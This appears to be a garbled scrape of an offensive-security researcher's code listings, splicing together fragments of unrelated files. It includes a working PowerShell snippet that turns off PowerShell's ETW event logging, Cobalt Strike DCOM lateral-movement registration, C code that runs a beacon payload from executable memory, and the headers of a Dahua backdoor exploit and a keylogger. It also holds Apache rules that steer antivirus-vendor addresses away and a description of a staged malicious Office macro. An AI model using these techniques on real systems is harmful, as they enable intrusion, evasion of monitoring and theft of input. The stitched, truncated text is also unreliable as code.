
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
namespace ComAbandonment
{
public class ComAbandonment
{
vysecurity / KillETW.ps1
Created June 10, 2018 12:47 — forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
#
# Disables the ETW provider that the PowerShell engine uses for its own tracing
# (System.Management.Automation.Tracing.PSEtwLogProvider) for the current session only.
# It reflectively writes 0 into the non-public instance field m_enabled of the
# System.Diagnostics.Eventing.EventProvider held in PSEtwLogProvider's static
# etwProvider field, which effectively disables Suspicious ScriptBlock Logging etc.
#
# NOTE(review): the original author points out that this command makes no attempt to
# hide itself from Suspicious ScriptBlock Logging; it is evaluated before the write
# takes effect, so the command text itself can still be logged. Reflective access to
# PSEtwLogProvider / EventProvider.m_enabled is therefore a usable detection signal.
#
# Wrapped in a script block so the intermediate variables do not leak into the session.
& {
    $eventProviderType = [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider')
    $enabledField      = $eventProviderType.GetField('m_enabled', 'NonPublic,Instance')

    $psEtwProviderType = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
    $etwProvider       = $psEtwProviderType.GetField('etwProvider', 'NonPublic,Static').GetValue($null)

    $enabledField.SetValue($etwProvider, 0)
}
# Lateral movement techniques based on research by enigma0x3 (Matt Nelson)
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
# Beacon implementation based on comexec.cna by Raphael Mudge
# https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2
# Register alias
# beacon_command_register only publishes the console help for the command:
# the command name, a one-line description, and the usage text (the two string
# literals are joined with Sleep's '.' concatenation operator). The alias body that
# actually performs the DCOM ShellExecute call is presumably defined elsewhere in the
# script and is not part of this block.
beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)",
"Usage: dcom_shellexecute [target] [listener]\n\n" .
"Spawn new Beacon on a target via DCOM ShellExecute Object.");
vysecurity / CredentialUI.cs
Created May 2, 2018 16:04 — forked from mayuki/CredentialUI.cs
Windows Common Credential UI Helper for .NET Framework
/*
* CredentialUI.cs - Windows Credential UI Helper
*
* License: Public Domain
*
*/
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;
using System.Security;
#!/usr/bin/python2.7
#
# Dahua backdoor Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
#
# Credentials: No credentials needed (Anonymous)
#Jacked from git history
#
import string
#include "stdafx.h"
// Allocates a len-byte RWX region (PAGE_EXECUTE_READWRITE) for the CS beacon, copies the
// payload into it, and starts it on a new thread.
// NOTE(review): the VirtualAlloc return value is not checked before the memcpy below, so
// an allocation failure dereferences NULL.
void spawnBeacon(char *payload, DWORD len) {
HANDLE threadHandle;
DWORD threadId = 0;
char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(alloc, payload, len);
vysecurity / InstallUtilMouseKeyLogger.cs
Created February 27, 2018 16:12
Input Capture - InstallUtil Hosted MouseClick / KeyLogger -
using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/*
* https://code.google.com/p/klog-sharp/
*/
vysecurity / gist:8dfb791c8fca952729e4f4f80b1ce1f4
Created November 16, 2017 23:31 — forked from aioutecism/gist:2638bb9eaf9ffc13348c
Set up a VPN Server (PPTP) on AWS and use it anywhere

Set up a VPN Server (PPTP) on AWS

Security note: PPTP (MS-CHAPv2 authentication with MPPE encryption) is widely regarded as cryptographically broken and should not be relied on for confidentiality; treat the steps below as a legacy/lab setup and prefer a modern protocol (e.g. WireGuard, OpenVPN or IPsec/IKEv2) for anything sensitive.

  1. Create an EC2 instance using Ubuntu 14.04 (the release these steps were written against; it is past end-of-life, so prefer a currently supported release and check that pptpd is still packaged for it).
  2. In the Security Group inbound rules, add an SSH rule (TCP, port 22) and a Custom TCP rule (TCP, port 1723). The original opens both to 0.0.0.0/0; at minimum restrict the SSH rule to your own source IP range. PPTP also carries its tunnel traffic over GRE (IP protocol 47), which a TCP-only rule does not permit — if clients authenticate but no traffic flows, add a GRE rule as well.
  3. Optional: Associate an Elastic IP with the instance.
  4. SSH into the instance.
  5. sudo apt-get install pptpd.
  6. sudo vim /etc/pptpd.conf. Uncomment localip 192.168.0.1 and remoteip 192.168.0.234-238,192.168.0.245.
  7. sudo vim /etc/ppp/pptpd-options. Uncomment ms-dns and ms-wins. Change the IP to Google's DNS like this:
RewriteEngine On
#LogLevel alert rewrite:trace5
# BURN AV BURN
# TrendMicro — remote-IP (-R) matches against address ranges the author attributes to
# TrendMicro; the conditions are OR'ed, so any single match satisfies the RewriteRule
# that follows (not shown here).
RewriteCond expr "-R '150.70.0.0/22'" [OR]
RewriteCond expr "-R '150.70.104.0/22'" [OR]
RewriteCond expr "-R '150.70.110.0/24'" [OR]
RewriteCond expr "-R '150.70.112.0/20'" [OR]
' Author Arno0x0x - https://twitter.com/Arno0x0x
'
' This macro downloads an XML bibliography source file.
' The <Title> element of this XML file actually contains a base64 encoded MSOffice template
' which itself contains another malicious macro much more detectable (meterpreter for instance).
'
' The base64 encoded file (payload) is extracted from the XML file, decoded and saved to the temporary folder.
' Only then is a new Word object instantiated to load this Office template and run a specific macro from it.
'
' This macro makes use of very basic tricks to evade potential sandbox analysis, such as popup windows, check of local printers